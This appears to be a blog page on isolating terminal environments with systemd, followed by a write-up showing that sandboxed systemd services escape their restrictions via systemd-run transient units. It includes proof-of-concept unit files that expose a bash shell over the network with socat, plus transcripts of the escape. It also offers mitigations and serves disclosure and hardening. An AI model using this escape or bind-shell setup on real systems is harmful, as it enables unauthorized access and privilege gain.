Isolation for terminal environments

TL;DR

I've tinkered with a solution based on systemd user services: https://codeberg.org/s1m/termenv. It works as expected, but I wish there were a stable solution for this.

For a long time, isolation on operating systems was only about isolation between users. It was accepted that applications belonging to the same user could access the same files and interact with each other. They all had the same rights.

Mobile OSes (Android, iOS) introduced per-application isolation. Two applications can't be trusted the same way, and they don't need to access the same data. Applications are still allowed to interact with each other, but only through dedicated interfaces. They have their own storage for their data and their config. If they need to access other directories, the user has to agree. Applications may use the device settings but, except for dedicated applications, they aren't allowed to edit them.

As on mobile devices, we need a way to isolate applications on the desktop. On Linux, a well-known solution is Flatpak. Flatpaks are built with a manifest that defines the permissions of the application. They can mount some user directories if they need to read them, access devices, sockets, etc. Portals exist to grant access to some resources at runtime. Most graphical applications available on Linux are also distributed as Flatpaks.
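
For example, Flatpak permissions can be inspected and overridden per application from the command line (the application ID below is only an illustration):

flatpak info --show-permissions org.mozilla.firefox
flatpak override --user --nofilesystem=home org.mozilla.firefox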

CLI applications and services are usually isolated using containers and systemd services.

Isolation for terminal environments

In addition to graphical applications, I wish to have different environments in my terminals, isolated from each other. In terminals, per-environment isolation is relevant, as we usually use many different applications in a single session.

I need an environment, as restricted as possible, responsible for updating my configs and my user packages. The configs and the user packages must be read-only for the other environments. And I need to be able to restrict access to the directories of other environments if I want to.

This avoids the easy .bashrc backdoor, tens of new hidden directories created by different dev tools, tools messing with virtual environments and user packages, and so on.

To define my needs:

  • In the environments, the host system must not be modifiable
  • A single environment dedicated to updating user packages must be allowed to do so, and everything else must be inaccessible to it
  • A single environment dedicated to updating my config must be allowed to do so, and everything else must be inaccessible to it
  • My configs must be readable by all other environments
  • The different environments must be able to override some configs/directories for themselves - this should not include sensitive directories, like the exec directories, the auto-executed scripts, or where the environment itself is defined.
  • In the environments it must not be possible to trivially escape the sandbox.

Many solutions to get different working environments exist:

  • toolbx, based on podman, allows running a different system with access to the user directories. It doesn't support isolation of the user home and runtime directories out of the box.
  • distrobox is similar to toolbx, but I haven't looked into it
  • systemd-homed areas, introduced in v258, but they only provide the ability to change the home directory to get different configs (yet?)

Nothing fits my needs out of the box, so I had to tinker with something. I was previously using something based on toolbx: I generated containers that changed the home directory and mounted some directories read-only.
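
As a rough sketch of that previous approach, using plain podman instead of the actual generation script (paths and image are placeholders):

# Run a container with a separate home directory, keeping the host UID,
# while mounting the real config read-only:
podman run -it --rm \
  --userns=keep-id \
  --env HOME=/home/envhome \
  --volume "$HOME/envs/dev:/home/envhome:rw" \
  --volume "$HOME/.config:/home/envhome/.config:ro" \
  registry.fedoraproject.org/fedora:latest bash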

My current solution

With my recent move to ParticleOS, an experimental image-based distribution with a deep integration of systemd, I've decided to edit my terminal environment scripts to use systemd user services.

There are two executable scripts: termlaunchmenu, which starts a menu to select an environment and runs the second script; and te, which applies the configuration of the selected environment and starts my configured command in a transient service.

termlaunchmenu is not very configurable at the moment and may need to be edited. It's supposed to be started with a system keyboard shortcut, and it depends on wofi.

te is much more configurable. The main config file is located at $HOME/.config/te/conf and it defines the command executed by the transient unit, the different groups of directories, and the default inaccessible, read-only, and read-writable directories. To prevent the sandbox from being trivially escaped, $XDG_RUNTIME_DIR/bus is inaccessible to all the environments.
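
As a minimal sketch (the COMMAND variable and the sample values are assumptions; the array names match the session example below):

# $HOME/.config/te/conf (sketch)
COMMAND="bash -l"                      # command executed by the transient unit

# Named groups of directories:
DEV_PATHS=( "$HOME/dev" )
DOC_PATHS=( "$HOME/Documents" )
CARGO=( "$HOME/.cargo" )

# Defaults, extended by each session:
NO_PATHS=( "$XDG_RUNTIME_DIR/bus" )    # inaccessible everywhere
RO_PATHS=( "$HOME/.config" )           # read-only by default
RW_PATHS=( )                           # read-write by default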

Then the different environment configs are defined in $HOME/.config/te/sessions/env_name. For example, the environment dedicated to updating cargo packages is defined as follows:

$HOME/.config/te/sessions/cargo:

NO_PATHS+=( "${DEV_PATHS[@]}" "${DOC_PATHS[@]}" )   # hide dev and doc directories
RW_PATHS+=( "${CARGO[@]}" )                         # allow writing to the cargo directories
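
Such arrays translate naturally into sandboxing properties of a transient unit. A minimal sketch of the assumed mechanism (the actual te script may differ):

ARGS=()
for p in "${NO_PATHS[@]}"; do ARGS+=( --property "InaccessiblePaths=$p" ); done
for p in "${RO_PATHS[@]}"; do ARGS+=( --property "ReadOnlyPaths=$p" ); done
for p in "${RW_PATHS[@]}"; do ARGS+=( --property "ReadWritePaths=$p" ); done
systemd-run --user --pty "${ARGS[@]}" $COMMAND   # unquoted on purpose: COMMAND may contain arguments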

The source is available on Codeberg: https://codeberg.org/s1m/termenv.

Results

So far, the solution works well. A few things can be improved (like denying access to runtime directories by default and writing an allow-list).

I honestly would prefer a stable solution for this. It would be fantastic if systemd-homed areas could be improved to:

  • Restrict access to the system
  • Restrict access to the root home (/home/myuser/) and to the other areas
  • Restrict access to the runtime directories of the user and of the other areas
  • Bind the content of the root home (inaccessible, RO, or RW)
  • Define groups of directories and configure how areas mount them (RO/RW) or not

Sandboxing and sandbox escape with systemd

Today, the most popular Linux service manager is systemd.

Services are defined in unit files located in well-known directories. Package units are in /usr/lib/systemd/system and administrators add their units to /etc/systemd/system. In addition to the system service manager, systemd provides a user service manager for user services. User units are in other directories, including in the user's home directory ($HOME/.config/systemd/user).

System and user services can be sandboxed with many different properties, including restrictions on the file system, device access, network interfaces, and so on.
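
For instance, a transient service can be started with a few common restrictions:

systemd-run --user \
  --property ProtectSystem=strict \
  --property ProtectHome=read-only \
  --property PrivateDevices=true \
  -S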

TL;DR

Because (1) with transient units it's possible to create a new service without writing a configuration file, (2) read-only access to the systemd socket doesn't prevent communication with it, and (3) systemd access control relies on polkit only: having a read-only filesystem doesn't prevent the creation of new services with more privileges than the current one.

Access control is based exclusively on polkit, which only applies to the system service manager and authorizes all calls from root. If you write units, do not run your system unit as root, and add ProtectHome=true to your service unit.

Otherwise, the systemd unit sandboxes are trivially escaped. If you really need to run as root, you may deny access to the systemd sockets as a workaround. It's not a bug, but it's not explicitly documented.

If you are using another sandbox system, be aware that these sockets can also be used to escape it.

Introduction

As mentioned recently, I've reinstalled my laptop. In my previous setup, I was using container-based isolation for various shell environments: I had a script to generate new toolbox containers with some isolation for the home and other directories. No surprise, this time I wanted to switch to a systemd-based isolation. (I will share it in another post.)

systemd-run is a tool to run services on demand using transient units: temporary units managed by systemd. It's useful for testing things or scheduling tasks, for example. Every time a new interactive shell is started with systemd-run (systemd-run --user -S), an orange circle is added to the title of the terminal window (🟠 ~). Other systemd features use transient units, like systemd-mount: it starts a temporary unit that mounts a device on the filesystem.

I was using systemd-run to test some sandbox properties (--property ProtectSystem=strict) until my window ended up with two circles in its title (🟠🟠 ~).
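
The observation is easy to reproduce; the nested shell starts without complaint, whatever properties the outer one carries:

# From a normal shell; one circle appears in the title (🟠 ~):
systemd-run --user --property ProtectSystem=strict -S
# From inside that sandboxed shell; a second circle appears (🟠🟠 ~):
systemd-run --user -S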

A few questions then arise: does systemd somehow check the restrictions of the calling service before starting a transient unit, so that a new service can only gain additional restrictions (and not lose them)? Does this concern only units managed by the user service manager, or also units managed by the system service manager? Did I miss something?

Impacted configurations

Transient units are temporary services managed by the service manager. They don't require any config file. So, as soon as we can talk to systemd, it is possible to start new units, even without write access to the config directories.
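
In practice, the only requirement is a reachable manager socket; systemd-run is merely a convenient client for the StartTransientUnit D-Bus call:

# The user service manager is reached through the session bus socket:
ls -l "$XDG_RUNTIME_DIR/bus"
# The system service manager through the system bus socket:
ls -l /run/dbus/system_bus_socket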

It could be more explicit, but the Sandboxing section of the systemd.exec man page contains a sentence about the ability to talk to systemd on a read-only system:

Note that the various options that turn directories read-only (such as ProtectSystem=, ReadOnlyPaths=, ...) do not affect the ability for programs to connect to and communicate with AF_UNIX sockets in these directories. These options cannot be used to lock down access to IPC services hence.

systemd uses polkit for access control. Polkit is a toolkit that allows unprivileged processes to talk to privileged processes. It allows any call from root to run a privileged action, and it isn't used by the systemd user service manager (which runs as the user, so isn't privileged).
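
The polkit action guarding unit management on the system manager can be inspected with pkaction; again, it isn't consulted for root callers, and never for the user manager:

pkaction --verbose --action-id org.freedesktop.systemd1.manage-units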

Given these three points, we can predict three possibilities:

  • systemd controls the caller service, and prevents sandboxed services from launching transient units with more privileges than their own
  • systemd controls the caller service, and prevents sandboxed services from launching transient units
  • systemd relies exclusively on polkit for access control, and no other controls are performed
A quick test as root, combining DeviceAllow= and ProtectSystem=, answers the question:

[root@archlinux ~]# systemd-run --property DeviceAllow=/dev/vda1 --property ProtectSystem=yes -S
Running as unit: run-p503-i803.service; invocation ID: 4d8fd6bf06534e50b5b478d209c53d7b
Press ^] three times within 1s to disconnect TTY.

[root@archlinux root]# mount /dev/vda2 /mnt
mount: /mnt: fsconfig() failed: /dev/vda2: Can't open blockdev.
       dmesg(1) may have more information after failed mount system call.

[root@archlinux root]# systemd-mount /dev/vda2 /mnt    # Accepted
Started unit mnt.mount for mount point: /mnt

It turns out that systemd relies exclusively on polkit for all access controls. And because polkit isn't used for user units, and because polkit accepts all requests from root, user services and services running as root are able to launch new systemd services with more privileges than their own.

In other words, ProtectSystem=strict alone does not prevent the process from trivially regaining full access to the system by asking systemd to start a new service without any sandbox attributes.

If the service runs as another user, but doesn't set ProtectHome=true (implied by DynamicUser=true) or deny access to the systemd sockets (InaccessiblePaths=/run/user/<UID>/bus), then the user service manager can be used to start a new service without sandbox attributes.
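
A sketch of that workaround as a unit directive (UID 1000 is an assumption; the '-' prefix makes the path optional when the user isn't logged in):

[Service]
# Deny access to the session bus socket, i.e. the user manager's API:
InaccessiblePaths=-/run/user/1000/bus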

POC

These tests can be performed with transient units, using systemd-run, but to confirm that they apply to real units, we can use a unit file that exposes a bash shell to the network with socat.

To illustrate the problem, we can try different configurations with sandboxing options:

  • A system unit running as root
  • A system unit running as a user (the escape works only while the user is logged in)
  • A user unit

Below are two examples, one for the system unit running as root, the other for the user unit.

System Unit - Root

In this example, the unit is run by the system service manager as root, with three sandboxing options: ProtectSystem=strict, ProtectHome=true and InaccessiblePaths=/etc/secret. This unit could be used to sandbox a service that requires certain privileges.

This is a common sandbox configuration.

[Unit]
Description=POC
After=network-online.target

[Service]
Type=simple
UMask=0007
ProtectSystem=strict
ProtectHome=true
InaccessiblePaths=/etc/secret

ExecStart=/sbin/socat tcp-l:8888,fork,reuseaddr exec:'bash -li',pty,stderr,setsid,sigint,sane
KillSignal=SIGINT

Restart=on-failure
TimeoutStopSec=5

[Install]
WantedBy=multi-user.target

The service can escape the sandbox with systemd-run -S. We can see that the process is correctly sandboxed at first: /etc/secret is not accessible. But it becomes accessible after starting a new, unrestricted service with systemd-run.

~> socat stdin tcp:localhost:8888
2025/02/24 16:05:18 socat[134374] W address is opened in read-write mode but only supports read-only
[root@poc /]# cat /etc/secret/poc
cat: /etc/secret/poc: No such file or directory

[root@poc /]# systemd-run -S
Running as unit: run-p4123-i134849.service
Press ^] three times within 1s to disconnect TTY.
[root@poc /]# cat /etc/secret/poc
poc

User Unit

In this example, the unit is run by the user service manager, with a single sandboxing option: ProtectHome=read-only. This unit could be used for a user service that is expected to read data from the home directory.

[Unit]
Description=POC
After=network-online.target

[Service]
Type=simple
ProtectHome=read-only

ExecStart=/sbin/socat tcp-l:8888,fork,reuseaddr exec:'bash -li',pty,stderr,setsid,sigint,sane
KillSignal=SIGINT

Restart=on-failure
TimeoutStopSec=5

[Install]
WantedBy=default.target

The service can escape the sandbox with systemd-run --user -S. We can see that the process is correctly sandboxed at first: $HOME is not writable. But it is writable after starting a new, unrestricted service with systemd-run.

~> socat stdin tcp:localhost:8888
2025/02/24 11:36:04 socat[46527] W address is opened in read-write mode but only supports read-only
[poc@poc ~]$ touch a
touch: cannot touch 'a': Read-only file system

[poc@poc ~]$ systemd-run --user -S
Running as unit: run-p5131-i46889.service
Press ^] three times within 1s to disconnect TTY.

[poc@poc ~]$ touch a
[poc@poc ~]$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  a

Escaping a system unit running as a user works the same way if/when the user is logged in.
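
A sketch of why: once the user is logged in, the session bus socket exists, and the sandboxed process only has to point at it (the environment setup is assumed, since a system unit doesn't inherit it):

export XDG_RUNTIME_DIR="/run/user/$(id -u)"
export DBUS_SESSION_BUS_ADDRESS="unix:path=$XDG_RUNTIME_DIR/bus"
systemd-run --user -S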

Conclusion

If you look at your own system, you'll find many service units running as root with ProtectSystem=yes|strict|true. The possibility of starting arbitrary, non-sandboxed services on a read-only file system doesn't seem to be widely known.

If you do some security tests and gain access to a sandboxed service, try systemd-run [--user] -S. You'll probably get more privileges.

If you're writing your own unit files, don't run your service as root and set ProtectHome=true, or be very careful if you don't. If you must run as root, deny access to most of /run, and at least to /run/dbus/system_bus_socket.
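
Applied to the root POC unit above, the mitigation is a single extra directive (a sketch; extend the list to whatever your service doesn't need):

[Service]
# In addition to the sandboxing options, deny the system bus socket:
InaccessiblePaths=/run/dbus/system_bus_socket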

I think systemd should put the ability to run unrestricted transient units behind a property. This capability should be enabled by default unless certain sandbox attributes are declared. Then, if the capability is not granted, systemd could either apply the caller's context to the transient unit, or deny transient units.

I opened a pull request (which may need some improvements) to systemd to apply the caller's context to transient units when the ability to execute an unrestricted transient unit is not granted. It was closed without any form of review, because that's how it works by design. By design, you can use systemd-mount to mount an unauthorized device.

At least, it might be a good idea to clarify this behavior in the documentation.